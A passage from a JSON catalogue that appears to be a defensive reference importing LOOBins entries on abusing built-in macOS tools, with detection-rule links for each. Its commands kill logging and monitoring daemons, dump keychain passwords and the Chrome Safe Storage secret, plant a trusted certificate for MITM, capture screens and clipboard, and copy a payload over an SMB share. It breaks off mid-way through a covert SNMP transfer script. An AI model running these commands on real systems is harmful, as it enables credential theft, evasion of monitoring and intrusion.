4997 ], 4998 "environment": [ 4999 "Local host" 5000 ], 5001 "availability": "Built in", 5002 "verification": "Upstream reference", 5003 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 5004 "detection": [ 5005 { 5006 "type": "Process execution monitoring for pkill", 5007 "value": "Process execution monitoring for pkill" 5008 }, 5009 { 5010 "type": "Endpoint Detection - pkill targeting security tools", 5011 "value": "Endpoint Detection - pkill targeting security tools" 5012 } 5013 ], 5014 "references": [ 5015 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/pkill.yml", 5016 "https://www.esentire.com/blog/fake-deepseek-site-infects-mac-users-with-atomic-stealer", 5017 "https://ss64.com/mac/pkill.html" 5018 ] 5019 }, 5020 { 5021 "id": "loobins:pkill:c051aba20a9aac26", 5022 "toolId": "loobins:pkill", 5023 "toolName": "pkill", 5024 "name": "Kill all processes for a user", 5025 "source": "LOOBins", 5026 "platform": [ 5027 "macOS" 5028 ], 5029 "capability": [ 5030 "Defense Evasion" 5031 ], 5032 "nativeCategory": [ 5033 "Defense Evasion", 5034 "Impact" 5035 ], 5036 "command": "pkill -u username", 5037 "description": "Terminate all processes belonging to a specific user, potentially ending user sessions or disrupting monitoring.", 5038 "mitre": [], 5039 "fullPath": [ 5040 "/usr/bin/pkill" 5041 ], 5042 "environment": [ 5043 "Local host" 5044 ], 5045 "availability": "Built in", 5046 "verification": "Upstream reference", 5047 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 5048 "detection": [ 5049 { 5050 "type": "Process execution monitoring for pkill", 5051 "value": "Process execution monitoring for pkill" 5052 }, 5053 { 5054 "type": "Endpoint Detection - pkill targeting security tools", 5055 "value": "Endpoint Detection - pkill targeting security tools" 5056 } 5057 ], 5058 "references": [ 5059 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/pkill.yml", 5060 "https://www.esentire.com/blog/fake-deepseek-site-infects-mac-users-with-atomic-stealer", 5061 "https://ss64.com/mac/pkill.html" 5062 ] 5063 }, 5064 { 5065 "id": "loobins:pkill:3f61e8515e59c3e8", 5066 "toolId": "loobins:pkill", 5067 "toolName": "pkill", 5068 "name": "Kill logging and monitoring daemons", 5069 "source": "LOOBins", 5070 "platform": [ 5071 "macOS" 5072 ], 5073 "capability": [ 5074 "Defense Evasion" 5075 ], 5076 "nativeCategory": [ 5077 "Defense Evasion" 5078 ], 5079 "command": "pkill -f \"syslog|auditd|osqueryd|esensor|nessusd\"", 5080 "description": "Terminate system logging and monitoring processes to evade detection.", 5081 "mitre": [], 5082 "fullPath": [ 5083 "/usr/bin/pkill" 5084 ], 5085 "environment": [ 5086 "Local host" 5087 ], 5088 "availability": "Built in", 5089 "verification": "Upstream reference", 5090 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 5091 "detection": [ 5092 { 5093 "type": "Process execution monitoring for pkill", 5094 "value": "Process execution monitoring for pkill" 5095 }, 5096 { 5097 "type": "Endpoint Detection - pkill targeting security tools", 5098 "value": "Endpoint Detection - pkill targeting security tools" 5099 } 5100 ], 5101 "references": [ 5102 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/pkill.yml", 5103 "https://www.esentire.com/blog/fake-deepseek-site-infects-mac-users-with-atomic-stealer", 5104 "https://ss64.com/mac/pkill.html" 5105 ] 5106 }, 5107 { 5108 "id": "loobins:pkill:3b9d034ed0f34b48", 5109 "toolId": "loobins:pkill", 5110 "toolName": "pkill", 5111 "name": "Kill process by exact name match", 5112 "source": "LOOBins", 5113 "platform": [ 5114 "macOS" 5115 ], 5116 "capability": [ 5117 "Defense Evasion" 5118 ], 5119 "nativeCategory": [ 5120 "Defense Evasion", 5121 "Impact" 5122 ], 5123 "command": "pkill -x com.apple.Safari", 5124 "description": "Use exact matching with -x flag to kill specific process by exact name rather than pattern.", 5125 "mitre": [], 5126 "fullPath": [ 5127 "/usr/bin/pkill" 5128 ], 5129 "environment": [ 5130 "Local host" 5131 ], 5132 "availability": "Built in", 5133 "verification": "Upstream reference", 5134 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 5135 "detection": [ 5136 { 5137 "type": "Process execution monitoring for pkill", 5138 "value": "Process execution monitoring for pkill" 5139 }, 5140 { 5141 "type": "Endpoint Detection - pkill targeting security tools", 5142 "value": "Endpoint Detection - pkill targeting security tools" 5143 } 5144 ], 5145 "references": [ 5146 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/pkill.yml", 5147 "https://www.esentire.com/blog/fake-deepseek-site-infects-mac-users-with-atomic-stealer", 5148 "https://ss64.com/mac/pkill.html" 5149 ] 5150 }, 5151 { 5152 "id": "loobins:plutil:924262c1c30d2ac6", 5153 "toolId": "loobins:plutil", 5154 "toolName": "plutil", 5155 "name": "Set app to run with dock icon hidden", 5156 "source": "LOOBins", 5157 "platform": [ 5158 "macOS" 5159 ], 5160 "capability": [ 5161 "Defense Evasion" 5162 ], 5163 "nativeCategory": [ 5164 "Defense Evasion" 5165 ], 5166 "command": "plutil -insert LSUIElement -string \"1\" /Applications/TargetApp.app/Contents/Info.plist", 5167 "description": "plutil can be used to set the \"LSUIElement\" attribute to true which will force the targeted app to run without the UI and dock icon.", 5168 "mitre": [], 5169 "fullPath": [ 5170 "/usr/bin/plutil" 5171 ], 5172 "environment": [ 5173 "Local host" 5174 ], 5175 "availability": "Built in", 5176 "verification": "Upstream reference", 5177 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 5178 "detection": [ 5179 { 5180 "type": "Splunk Security Content: MacOS plutil", 5181 "value": "https://research.splunk.com/endpoint/c11f2b57-92c1-4cd2-b46c-064eafb833ac/" 5182 } 5183 ], 5184 "references": [ 5185 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/plutil.yml", 5186 "https://scriptingosx.com/2016/11/editing-property-lists/", 5187 "https://attack.mitre.org/techniques/T1647/" 5188 ] 5189 }, 5190 { 5191 "id": "loobins:profiles:d0384102b00daeed", 5192 "toolId": "loobins:profiles", 5193 "toolName": "profiles", 5194 "name": "Collect system DEP information.", 5195 "source": "LOOBins", 5196 "platform": [ 5197 "macOS" 5198 ], 5199 "capability": [ 5200 "Discovery" 5201 ], 5202 "nativeCategory": [ 5203 "Discovery" 5204 ], 5205 "command": "sudo profiles show -type enrollment", 5206 "description": "The following command determines whether device is DEP(Device Enrolment Program) enabled and output the DEP information.", 5207 "mitre": [], 5208 "fullPath": [ 5209 "/usr/bin/profiles" 5210 ], 5211 "environment": [ 5212 "Local host" 5213 ], 5214 "availability": "Built in", 5215 "verification": "Upstream reference", 5216 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 5217 "detection": [ 5218 { 5219 "type": "No detections at time of publishing.", 5220 "value": "No detections at time of publishing." 5221 } 5222 ], 5223 "references": [ 5224 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/profiles.yml", 5225 "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-mdm" 5226 ] 5227 }, 5228 { 5229 "id": "loobins:profiles:eb38ca70e6c00880", 5230 "toolId": "loobins:profiles", 5231 "toolName": "profiles", 5232 "name": "Remove configuration profiles.", 5233 "source": "LOOBins", 5234 "platform": [ 5235 "macOS" 5236 ], 5237 "capability": [], 5238 "nativeCategory": [ 5239 "Impact" 5240 ], 5241 "command": "profiles remove -identifier com.profile.identifier -password <password>", 5242 "description": "The following command deletes the specified profiles. An optional password used when removing a configuration profile which requires the password removal option.", 5243 "mitre": [], 5244 "fullPath": [ 5245 "/usr/bin/profiles" 5246 ], 5247 "environment": [ 5248 "Local host" 5249 ], 5250 "availability": "Built in", 5251 "verification": "Upstream reference", 5252 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 5253 "detection": [ 5254 { 5255 "type": "No detections at time of publishing.", 5256 "value": "No detections at time of publishing." 5257 } 5258 ], 5259 "references": [ 5260 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/profiles.yml", 5261 "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-mdm" 5262 ] 5263 }, 5264 { 5265 "id": "loobins:safaridriver:3df2d8c33d88e234", 5266 "toolId": "loobins:safaridriver", 5267 "toolName": "safaridriver", 5268 "name": "Enable safaridriver", 5269 "source": "LOOBins", 5270 "platform": [ 5271 "macOS" 5272 ], 5273 "capability": [], 5274 "nativeCategory": [ 5275 "Command and Control", 5276 "Exfiltration" 5277 ], 5278 "command": "sudo safaridriver --enable", 5279 "description": "The following command can be used to enable the WebDriver Safari browser API. The command must be run as root or with sudo privileges.", 5280 "mitre": [], 5281 "fullPath": [ 5282 "/System/Cryptexes/App/usr/bin/safaridriver", 5283 "/usr/bin/safaridriver" 5284 ], 5285 "environment": [ 5286 "Local host" 5287 ], 5288 "availability": "Built in", 5289 "verification": "Upstream reference", 5290 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 5291 "detection": [ 5292 { 5293 "type": "No detections at time of publishing", 5294 "value": "No detections at time of publishing" 5295 } 5296 ], 5297 "references": [ 5298 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/safaridriver.yml", 5299 "https://developer.apple.com/documentation/webkit/about_webdriver_for_safari", 5300 "https://starlabs.sg/blog/2021/04-you-talking-to-me/" 5301 ] 5302 }, 5303 { 5304 "id": "loobins:say:6807eaa8653a2f11", 5305 "toolId": "loobins:say", 5306 "toolName": "say", 5307 "name": "Read sensitive data", 5308 "source": "LOOBins", 5309 "platform": [ 5310 "macOS" 5311 ], 5312 "capability": [ 5313 "Defense Evasion", 5314 "Collection" 5315 ], 5316 "nativeCategory": [ 5317 "Defense Evasion", 5318 "Collection" 5319 ], 5320 "command": "say -f /home/user/sensitive-files -i > loot.txt;", 5321 "description": "The following command can read and process sensitive files and redirects the output to a file..", 5322 "mitre": [], 5323 "fullPath": [ 5324 "/usr/bin/say" 5325 ], 5326 "environment": [ 5327 "Local host" 5328 ], 5329 "availability": "Built in", 5330 "verification": "Upstream reference", 5331 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 5332 "detection": [ 5333 { 5334 "type": "No detection content available", 5335 "value": "No detection content available" 5336 } 5337 ], 5338 "references": [ 5339 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/say.yml", 5340 "https://ss64.com/osx/say.html" 5341 ] 5342 }, 5343 { 5344 "id": "loobins:say:7ef0bb01f0a5efcf", 5345 "toolId": "loobins:say", 5346 "toolName": "say", 5347 "name": "Collect clipboard data", 5348 "source": "LOOBins", 5349 "platform": [ 5350 "macOS" 5351 ], 5352 "capability": [ 5353 "Defense Evasion", 5354 "Discovery", 5355 "Collection" 5356 ], 5357 "nativeCategory": [ 5358 "Defense Evasion", 5359 "Reconnaissance", 5360 "Discovery", 5361 "Collection" 5362 ], 5363 "command": "osascript -e 'set volume output muted true' ; say $(pbpaste) -i > loot.txt;", 5364 "description": "The command is designed to enhance privacy by muting the system volume,using a less recognizable \"Whisper\" voice with the \"say\" command, processing the copied text in the clipboard, and saving the output to a file named \"loot.txt.\"", 5365 "mitre": [], 5366 "fullPath": [ 5367 "/usr/bin/say" 5368 ], 5369 "environment": [ 5370 "Local host" 5371 ], 5372 "availability": "Built in", 5373 "verification": "Upstream reference", 5374 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 5375 "detection": [ 5376 { 5377 "type": "No detection content available", 5378 "value": "No detection content available" 5379 } 5380 ], 5381 "references": [ 5382 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/say.yml", 5383 "https://ss64.com/osx/say.html" 5384 ] 5385 }, 5386 { 5387 "id": "loobins:screencapture:1c0650f3bbaf5b35", 5388 "toolId": "loobins:screencapture", 5389 "toolName": "screencapture", 5390 "name": "Continuously capture screenshots", 5391 "source": "LOOBins", 5392 "platform": [ 5393 "macOS" 5394 ], 5395 "capability": [ 5396 "Collection" 5397 ], 5398 "nativeCategory": [ 5399 "Collection" 5400 ], 5401 "command": "while true; do ts=$(date +\"%Y%m%d-%H%M%S\"); o=\"/tmp/screenshots\"; screencapture -x \"$o/ss-$ts.png\"; sleep 10; done", 5402 "description": "The following command demonstrates how an attacker can use the tool to capture screenshots every 10 seconds. The -x flag prevents snapshot sounds from being played.", 5403 "mitre": [], 5404 "fullPath": [ 5405 "/usr/sbin/screencapture" 5406 ], 5407 "environment": [ 5408 "Local host" 5409 ], 5410 "availability": "Built in", 5411 "verification": "Upstream reference", 5412 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 5413 "detection": [ 5414 { 5415 "type": "Sigma: Screen Capture - macOS", 5416 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_screencapture.yml" 5417 } 5418 ], 5419 "references": [ 5420 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/screencapture.yml", 5421 "https://ss64.com/osx/screencapture.html" 5422 ] 5423 }, 5424 { 5425 "id": "loobins:scutil:8bc671e538a2f395", 5426 "toolId": "loobins:scutil", 5427 "toolName": "scutil", 5428 "name": "DNS configuration", 5429 "source": "LOOBins", 5430 "platform": [ 5431 "macOS" 5432 ], 5433 "capability": [ 5434 "Discovery" 5435 ], 5436 "nativeCategory": [ 5437 "Discovery" 5438 ], 5439 "command": "scutil --dns", 5440 "description": "Get the current DNS configuration of the systems", 5441 "mitre": [], 5442 "fullPath": [ 5443 "/usr/bin/scutil" 5444 ], 5445 "environment": [ 5446 "Local host" 5447 ], 5448 "availability": "Built in", 5449 "verification": "Upstream reference", 5450 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 5451 "detection": [ 5452 { 5453 "type": "No detections at time of publishing", 5454 "value": "No detections at time of publishing" 5455 } 5456 ], 5457 "references": [ 5458 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/scutil.yml", 5459 "https://macosbin.com/bin/scutil", 5460 "https://ss64.com/osx/scutil.html" 5461 ] 5462 }, 5463 { 5464 "id": "loobins:scutil:66290cdfc7045939", 5465 "toolId": "loobins:scutil", 5466 "toolName": "scutil", 5467 "name": "Proxy configuration", 5468 "source": "LOOBins", 5469 "platform": [ 5470 "macOS" 5471 ], 5472 "capability": [ 5473 "Discovery" 5474 ], 5475 "nativeCategory": [ 5476 "Discovery" 5477 ], 5478 "command": "scutil --proxy", 5479 "description": "Get the current proxy configuration of the systems", 5480 "mitre": [], 5481 "fullPath": [ 5482 "/usr/bin/scutil" 5483 ], 5484 "environment": [ 5485 "Local host" 5486 ], 5487 "availability": "Built in", 5488 "verification": "Upstream reference", 5489 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 5490 "detection": [ 5491 { 5492 "type": "No detections at time of publishing", 5493 "value": "No detections at time of publishing" 5494 } 5495 ], 5496 "references": [ 5497 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/scutil.yml", 5498 "https://macosbin.com/bin/scutil", 5499 "https://ss64.com/osx/scutil.html" 5500 ] 5501 }, 5502 { 5503 "id": "loobins:scutil:a42e857b47431b0e", 5504 "toolId": "loobins:scutil", 5505 "toolName": "scutil", 5506 "name": "Network reachability", 5507 "source": "LOOBins", 5508 "platform": [ 5509 "macOS" 5510 ], 5511 "capability": [ 5512 "Discovery" 5513 ], 5514 "nativeCategory": [ 5515 "Discovery" 5516 ], 5517 "command": "scutil -r { nodename | address | local-address remote-address }", 5518 "description": "Check if the destination host is reachable from your Mac", 5519 "mitre": [], 5520 "fullPath": [ 5521 "/usr/bin/scutil" 5522 ], 5523 "environment": [ 5524 "Local host" 5525 ], 5526 "availability": "Built in", 5527 "verification": "Upstream reference", 5528 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 5529 "detection": [ 5530 { 5531 "type": "No detections at time of publishing", 5532 "value": "No detections at time of publishing" 5533 } 5534 ], 5535 "references": [ 5536 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/scutil.yml", 5537 "https://macosbin.com/bin/scutil", 5538 "https://ss64.com/osx/scutil.html" 5539 ] 5540 }, 5541 { 5542 "id": "loobins:scutil:c8f9a92cde041427", 5543 "toolId": "loobins:scutil", 5544 "toolName": "scutil", 5545 "name": "Hostname, localhost name and computername", 5546 "source": "LOOBins", 5547 "platform": [ 5548 "macOS" 5549 ], 5550 "capability": [ 5551 "Discovery" 5552 ], 5553 "nativeCategory": [ 5554 "Discovery" 5555 ], 5556 "command": "scutil --get { HostName | LocalHostName | ComputerName }", 5557 "description": "Display the current hostname, localhost name and computername", 5558 "mitre": [], 5559 "fullPath": [ 5560 "/usr/bin/scutil" 5561 ], 5562 "environment": [ 5563 "Local host" 5564 ], 5565 "availability": "Built in", 5566 "verification": "Upstream reference", 5567 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 5568 "detection": [ 5569 { 5570 "type": "No detections at time of publishing", 5571 "value": "No detections at time of publishing" 5572 } 5573 ], 5574 "references": [ 5575 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/scutil.yml", 5576 "https://macosbin.com/bin/scutil", 5577 "https://ss64.com/osx/scutil.html" 5578 ] 5579 }, 5580 { 5581 "id": "loobins:security:2eedc72739c333fe", 5582 "toolId": "loobins:security", 5583 "toolName": "security", 5584 "name": "Dump credentials, keys, certificates, and other sensitive information from Keychain", 5585 "source": "LOOBins", 5586 "platform": [ 5587 "macOS" 5588 ], 5589 "capability": [ 5590 "Credential Access" 5591 ], 5592 "nativeCategory": [ 5593 "Credential Access" 5594 ], 5595 "command": "sudo security dump-keychain -d login.keychain", 5596 "description": "This command will dump keychain passwords from login.keychain", 5597 "mitre": [], 5598 "fullPath": [ 5599 "/usr/bin/security" 5600 ], 5601 "environment": [ 5602 "Local host" 5603 ], 5604 "availability": "Built in", 5605 "verification": "Upstream reference", 5606 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 5607 "detection": [ 5608 { 5609 "type": "Sigma: Credentials from Password Stores - Keychain", 5610 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml" 5611 }, 5612 { 5613 "type": "Elastic: Access to Keychain Credentials Directories", 5614 "value": "https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_credentials_keychains.toml" 5615 }, 5616 { 5617 "type": "Elastic: Credential Access Dumping Keychain Security", 5618 "value": "https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_dumping_keychain_security.toml" 5619 }, 5620 { 5621 "type": "Elastic: Keychain Password Retrieval via Command Line", 5622 "value": "https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml" 5623 }, 5624 { 5625 "type": "Jamf Protect: Detect Keychain dumping using security", 5626 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/keychain_dumped" 5627 } 5628 ], 5629 "references": [ 5630 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/security.yml", 5631 "https://www.netmeister.org/blog/keychain-passwords.html", 5632 "https://ss64.com/osx/security.html" 5633 ] 5634 }, 5635 { 5636 "id": "loobins:security:81de7ed93c807a66", 5637 "toolId": "loobins:security", 5638 "toolName": "security", 5639 "name": "Retrieve Chrome's \"Chrome Safe Storage\" password manager secret", 5640 "source": "LOOBins", 5641 "platform": [ 5642 "macOS" 5643 ], 5644 "capability": [ 5645 "Credential Access" 5646 ], 5647 "nativeCategory": [ 5648 "Credential Access" 5649 ], 5650 "command": "security find-generic-password -w -s \"Chrome Safe Storage\"", 5651 "description": "This command will retrieve the Chrome Safe Storage password manager secret from the keychain.", 5652 "mitre": [], 5653 "fullPath": [ 5654 "/usr/bin/security" 5655 ], 5656 "environment": [ 5657 "Local host" 5658 ], 5659 "availability": "Built in", 5660 "verification": "Upstream reference", 5661 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 5662 "detection": [ 5663 { 5664 "type": "Sigma: Credentials from Password Stores - Keychain", 5665 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml" 5666 }, 5667 { 5668 "type": "Elastic: Access to Keychain Credentials Directories", 5669 "value": "https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_credentials_keychains.toml" 5670 }, 5671 { 5672 "type": "Elastic: Credential Access Dumping Keychain Security", 5673 "value": "https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_dumping_keychain_security.toml" 5674 }, 5675 { 5676 "type": "Elastic: Keychain Password Retrieval via Command Line", 5677 "value": "https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml" 5678 }, 5679 { 5680 "type": "Jamf Protect: Detect Keychain dumping using security", 5681 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/keychain_dumped" 5682 } 5683 ], 5684 "references": [ 5685 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/security.yml", 5686 "https://www.netmeister.org/blog/keychain-passwords.html", 5687 "https://ss64.com/osx/security.html" 5688 ] 5689 }, 5690 { 5691 "id": "loobins:security:81b1fcfde9e5f88c", 5692 "toolId": "loobins:security", 5693 "toolName": "security", 5694 "name": "Add an arbitrary trusted certificate to aid a MITM attack", 5695 "source": "LOOBins", 5696 "platform": [ 5697 "macOS" 5698 ], 5699 "capability": [ 5700 "Defense Evasion" 5701 ], 5702 "nativeCategory": [ 5703 "Defense Evasion" 5704 ], 5705 "command": "security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain bad_cert.crt", 5706 "description": "This command will add a certificate to the keychain.", 5707 "mitre": [], 5708 "fullPath": [ 5709 "/usr/bin/security" 5710 ], 5711 "environment": [ 5712 "Local host" 5713 ], 5714 "availability": "Built in", 5715 "verification": "Upstream reference", 5716 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 5717 "detection": [ 5718 { 5719 "type": "Sigma: Credentials from Password Stores - Keychain", 5720 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml" 5721 }, 5722 { 5723 "type": "Elastic: Access to Keychain Credentials Directories", 5724 "value": "https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_credentials_keychains.toml" 5725 }, 5726 { 5727 "type": "Elastic: Credential Access Dumping Keychain Security", 5728 "value": "https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_dumping_keychain_security.toml" 5729 }, 5730 { 5731 "type": "Elastic: Keychain Password Retrieval via Command Line", 5732 "value": "https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml" 5733 }, 5734 { 5735 "type": "Jamf Protect: Detect Keychain dumping using security", 5736 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/keychain_dumped" 5737 } 5738 ], 5739 "references": [ 5740 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/security.yml", 5741 "https://www.netmeister.org/blog/keychain-passwords.html", 5742 "https://ss64.com/osx/security.html" 5743 ] 5744 }, 5745 { 5746 "id": "loobins:sfltool:1a930e98a41d0d09", 5747 "toolId": "loobins:sfltool", 5748 "toolName": "sfltool", 5749 "name": "Display Login Items", 5750 "source": "LOOBins", 5751 "platform": [ 5752 "macOS" 5753 ], 5754 "capability": [ 5755 "Discovery" 5756 ], 5757 "nativeCategory": [ 5758 "Discovery" 5759 ], 5760 "command": "sfltool dumpbtm", 5761 "description": "Identify all current login and background items configured on the system.", 5762 "mitre": [], 5763 "fullPath": [ 5764 "/usr/bin/sfltool" 5765 ], 5766 "environment": [ 5767 "Local host" 5768 ], 5769 "availability": "Built in", 5770 "verification": "Upstream reference", 5771 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 5772 "detection": [ 5773 { 5774 "type": "Jamf Protect: Detect attempts to dump BTM or being reverted to installation defaults", 5775 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/sfltool_activity" 5776 } 5777 ], 5778 "references": [ 5779 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sfltool.yml", 5780 "https://www.unix.com/man-page/mojave/1/sfltool/", 5781 "https://eclecticlight.co/2023/02/15/controlling-login-and-background-items-in-ventura/" 5782 ] 5783 }, 5784 { 5785 "id": "loobins:sfltool:d845cfd089e6a465", 5786 "toolId": "loobins:sfltool", 5787 "toolName": "sfltool", 5788 "name": "Reset Login Items to Defaults", 5789 "source": "LOOBins", 5790 "platform": [ 5791 "macOS" 5792 ], 5793 "capability": [ 5794 "Defense Evasion" 5795 ], 5796 "nativeCategory": [ 5797 "Defense Evasion" 5798 ], 5799 "command": "sfltool resetbtm", 5800 "description": "Reset all third-party Login Items and revert to installation defaults.", 5801 "mitre": [], 5802 "fullPath": [ 5803 "/usr/bin/sfltool" 5804 ], 5805 "environment": [ 5806 "Local host" 5807 ], 5808 "availability": "Built in", 5809 "verification": "Upstream reference", 5810 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 5811 "detection": [ 5812 { 5813 "type": "Jamf Protect: Detect attempts to dump BTM or being reverted to installation defaults", 5814 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/sfltool_activity" 5815 } 5816 ], 5817 "references": [ 5818 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sfltool.yml", 5819 "https://www.unix.com/man-page/mojave/1/sfltool/", 5820 "https://eclecticlight.co/2023/02/15/controlling-login-and-background-items-in-ventura/" 5821 ] 5822 }, 5823 { 5824 "id": "loobins:sharing:a3a779c08185c705", 5825 "toolId": "loobins:sharing", 5826 "toolName": "sharing", 5827 "name": "Create an SMB share on a target over SSH for lateral tool transfer", 5828 "source": "LOOBins", 5829 "platform": [ 5830 "macOS" 5831 ], 5832 "capability": [ 5833 "Lateral Movement" 5834 ], 5835 "nativeCategory": [ 5836 "Lateral Movement" 5837 ], 5838 "command": "# On target (via SSH): create share directory, start smbd, create the share\nssh user@<TARGET_IP> 'mkdir -p ~/share && sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.smbd.plist && sudo sharing -a /Users/user/share -n share -s 001'\n\n# On attacker: mount the share using osascript and transfer a file\nosascript -e 'mount volume \"smb://user:<PASSWORD>@<TARGET_IP>/share\"'\ncp payload.sh /Volumes/share/", 5839 "description": "With SSH access to the target, the sharing utility can create an SMB share pointing to a directory on the target. Combined with the macOS smbd LaunchDaemon, the share becomes accessible over the network. The attacker can then mount the share using osascript and copy files directly into it, which appear immediately in the target's share directory. The -s 001 flag enables SMB access on the share.", 5840 "mitre": [], 5841 "fullPath": [ 5842 "/usr/sbin/sharing" 5843 ], 5844 "environment": [ 5845 "Local host" 5846 ], 5847 "availability": "Built in", 5848 "verification": "Upstream reference", 5849 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 5850 "detection": [ 5851 { 5852 "type": "No detections at time of publishing", 5853 "value": "No detections at time of publishing" 5854 } 5855 ], 5856 "references": [ 5857 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sharing.yml", 5858 "https://ss64.com/mac/sharing.html", 5859 "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" 5860 ] 5861 }, 5862 { 5863 "id": "loobins:snmptrap:d22536ed519866e6", 5864 "toolId": "loobins:snmptrap", 5865 "toolName": "snmptrap", 5866 "name": "Covert file transfer via SNMP trap payloads", 5867 "source": "LOOBins", 5868 "platform": [ 5869 "macOS" 5870 ], 5871 "capability": [ 5872 "Lateral Movement" 5873 ], 5874 "nativeCategory": [ 5875 "Lateral Movement", 5876 "Exfiltration", 5877 "Command and Control" 5878 ], 5879 "command": "# On receiver: install trap handler script\nsudo tee /usr/local/bin/trap_handler.sh > /dev/null << 'EOF'\n#!/bin/bash\nTRANSFER_DIR=\"/tmp/snmp_transfers\"\nSTATE_FILE=\"/tmp/snmp_transfer_state\"\nmkdir -p \"$TRANSFER_DIR\"\nwhile read line; do\n if echo \"$line\" | grep -q \"SNMPv2-SMI::enterprises.99999.1\"; 